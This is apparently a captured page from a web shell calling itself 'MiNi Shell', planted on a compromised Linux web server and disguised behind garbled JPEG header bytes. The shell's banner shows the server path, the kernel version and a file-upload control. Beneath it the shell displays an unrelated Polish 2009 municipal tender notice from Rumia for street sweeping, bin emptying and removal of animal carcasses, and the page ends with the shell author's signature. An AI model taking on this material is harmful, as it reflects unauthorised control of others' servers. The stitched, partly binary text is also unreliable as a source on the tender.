JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/39781-N-2009.html

<p class="kh_header"><b>Rumia: Utrzymanie czystości pasów drogowych na terenach ulic utwardzonych miasta Rumi z uwzględnieniem podziału na rejon A i rejon B  w 2009 roku.</b><br>
<b>Numer ogłoszenia: 39781 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości pasów drogowych na terenach ulic utwardzonych miasta Rumi z uwzględnieniem podziału na rejon A i rejon B  w 2009 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości/zakresu zamówienia: 
1)	Utrzymanie czystości pasów drogowych na terenach ulic utwardzonych miasta Rumi z uwzględnieniem  
      podziału na rejon A i rejon B  w 2009 roku.
2)	Zakres prac obejmuje sprzątanie, które  polega na :

2.1)mechaniczne zamiatanie jezdni: 
Mechaniczne zamiatanie jezdni zamiatarką na całej szerokości jezdni, ze szczególnym uwzględnieniem terenu przy krawężnikach. 
Usługa obejmuje ręczne doczyszczenie ręczne całej szerokości jezdni oraz zatok autobusowych i parkingów wraz z terenem przy krawężnikach i opaskami bezpieczeństwa.
Zebrane zanieczyszczenia należy przekazać do Eko Doliny Sp. z. o.o. w Łężycach.
Załadunek i wywóz zanieczyszczeń do zakładu utylizacji winien nastąpić nie później niż w ciągu 24 godzin po uprzątnięciu śmieci, przy czym nie dopuszcza się pozostawienia zebranych śmieci przez niedzielę lub święto.

             Częstotliwość zamiatania jezdni w rejonie A, zgodnie z Załącznikiem nr 2
Częstotliwość zamiatania jezdni w rejonie B, zgodnie z Załącznikiem nr 4

       2.2) letnie zmywanie jezdni: 
Mechaniczne polewanie i zmywanie jezdni polewarko-zmywarką.
Zmywanie mechaniczne obejmuje całą szerokość jezdni wraz z powierzchniami  zatok przystankowych i parkingowych usytuowanych w pasie drogi.
Zmywanie musi gwarantować zmycie z całej szerokości jezdni drobnych zanieczyszczeń 
i pyłu pozostałego po mechanicznym zamiataniu, w sposób nie powodujący zanieczyszczenia przyległych do jezdni chodników, opasek bezpieczeństwa i terenów zielonych. Dostęp do wody przemysłowej zapewni Wykonawca we własnym zakresie, jak również ponosi jej koszt.
Częstotliwość: w okresie od 01.05. - 31.08.09 1 x miesiąc; w sytuacjach wyjątkowych (np. kilkunastodniowa susza) - na zgłoszenie Zamawiającego.

       2.3) oczyszczanie pasa drogowego:
Mechaniczne i ręczne zbieranie wszystkich zanieczyszczeń, w tym: piasku, puszek, butelek, niedopałków papierosów, kapsli, folii, kartonów, papierów, worków i  tzw. reklamówek (wraz 
z zawartością), gałęzi wyłamanych przez wiatr, liści, nasion drzew i krzewów, chwastów, worków ze śmieciami i liśćmi oraz innych odpadów, w tym wielkogabarytowych, porzuconych przez nieznanego sprawcę, na szerokości całego pasa drogowego.
Usługa nie obejmuje wygrabiania liści z trawników znajdujących się w pasie drogi.

Zebrane zanieczyszczenia należy przekazać do Eko Doliny Sp. z. o.o. w Łężycach
Załadunek i wywóz zanieczyszczeń do zakładu utylizacji winien nastąpić nie później niż w ciągu 24 godzin po uprzątnięciu śmieci, przy czym nie dopuszcza się pozostawienia zebranych śmieci przez niedzielę lub święto.
Częstotliwość oczyszczania pasa drogowego w rejonie A, według Załącznika nr 2.
Częstotliwość oczyszczania pasa drogowego w rejonie B, według Załącznika nr 4.

       2.3.1) usuwanie wylewów:
Oczyszczenia pasa drogowego należy dokonać w ciągu 72 godzin od zgłoszenia przez Zamawiającego. W przypadku, gdy występują w tym czasie dni świąteczne - wykonanie prac w ciągu 96 godzin.

      2.3.2) interwencja I°
Prace oczyszczenia pasa drogowego należy wykonać na zgłoszenie Urzędu Miasta bądź Straży Miejskiej w Rumi, w ciągu 24 godzin od zgłoszenia, również w dni wolne od pracy. W przypadku, gdy w tym czasie występują dni świąteczne - wykonanie prac w ciągu 72 godzin.

      2.3.3) interwencja II°
Oczyszczenia pasa drogowego należy dokonać na zgłoszenie Urzędu Miasta bądź Straży Miejskiej w Rumi, w ciągu 6 godz. od zgłoszenia, również w dni wolne od pracy i w godzinach nocnych.

     2.4)	Opróżnianie koszy ulicznych oraz koszy na psie odchody:
Usługa obejmuje:
a) opróżnianie koszy z częstotliwością 3 x w tygodniu: poniedziałek, środa, piątek 
        oraz interwencyjnie na zgłoszenie Zamawiającego,
b) oczyszczanie terenu wokół koszy w trakcie ich opróżniania w odległości 2 m, 
        łącznie z zamieceniem lub wygrabieniem,
c) mycie i dezynfekcję koszy, przynajmniej raz w trakcie obowiązywania umowy - 
       termin należy uzgodnić Zamawiającym,
d)   ustawianie przewróconych lub przestawionych koszy,
e)   informowanie Zamawiającego o zniszczeniu lub skradzeniu koszy.

Ilość i lokalizację koszy w rejonie A zamieszczono w Załączniku nr 1. 
Ilość i lokalizację koszy w rejonie B zamieszczono w Załączniku nr 3.

      2.5)	Zbieranie z pasa drogi a także transport i unieszkodliwianie zwłok bezdomnych 
             zwierząt lub ich części. 
             Prace należy wykonać niezwłocznie nie później niż w ciągu 12 godzin od zgłoszenia przez 
             Zamawiającego.
             Wykonawca winien oddać zebrane zwłoki zwierząt lub ich części do zakładu 
             utylizacji tego typu odpadów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.61.10.00-3, 90.51.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu:
     O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
      nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
      innych podmiotów do udostępnienia potencjału technicznego  i osób  zdolnych do
      wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24
      ust. 1 i 2 ustawy Pzp;
5)	posiadają zezwolenia na transport odpadów zgodnie z ustawą z dnia 27.04.2001 r. o odpadach  ( t.j. Dz. 
       U.  z  2007 r., Nr 39, poz. 251 z późn. zm.);
6)	posiadają zezwolenie w zakresie odbierania odpadów komunalnych zgodnie z ustawą z dnia 
13.09.  1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U z 2005 r. Nr 236, poz. 2008 z późn. zm.).

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
    Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych 
     oświadczeń lub dokumentów, według formuły spełnia-niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub 
           czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp składa następujące dokumenty:
1)	Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1;
2)	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy pzp oraz oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 pzp. (zawarte w formularzu ofertowym);
3)	Pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik; 
4)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
5)	Zezwolenie na transport odpadów zgodnie z ustawą z dnia 27.04.2001 r. o odpadach (t.j. Dz. U.  z 2007 r., Nr 39, poz. 251 z późn. zm.)
6)	Zezwolenie w zakresie odbierania odpadów komunalnych zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U z 2005 r. Nr 236, poz. 2008 z późn. zm.) 
- Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed dniem składania ofert.     

          Warunki wymienione w części A pkt  2 i 4, mają zastosowanie do wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, natomiast wymagania wymienione w części A pkt 1, 3, 5 i 6 Wykonawcy spełniają łącznie.

B. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty:
1)	wykaz (co najmniej jednej) usług wykonanych w ciągu ostatnich trzech lat o charakterze porównywalnym z przedmiotem niniejszego zamówienia tj. utrzymaniu czystości terenów miejskich, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, o wartości co najmniej 100.000 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie,
2)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje  wykonawca tj. 
     co  najmniej:
  a) zamiatarka - szt. 1, 
  b) polewaczko-zmywarka - szt. 1,
  c) urządzenie do mechanicznego zamiatania chodników.

C. Dokumenty wymagane w przypadku składania oferty wspólnej: 
  - Oferta winna zawierać: oświadczenia i dokumenty opisane w tekście w części 
     A i B.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rumia.eu                      (BIP- zamówienia publiczne - przetargi aktualne).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, Pokój nr 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 12:30, miejsce: Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, 
      Pokój nr 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com